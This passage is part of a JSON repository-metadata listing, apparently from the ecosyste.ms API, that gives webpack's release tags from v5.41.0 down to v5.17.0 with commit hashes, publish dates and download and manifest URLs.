":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14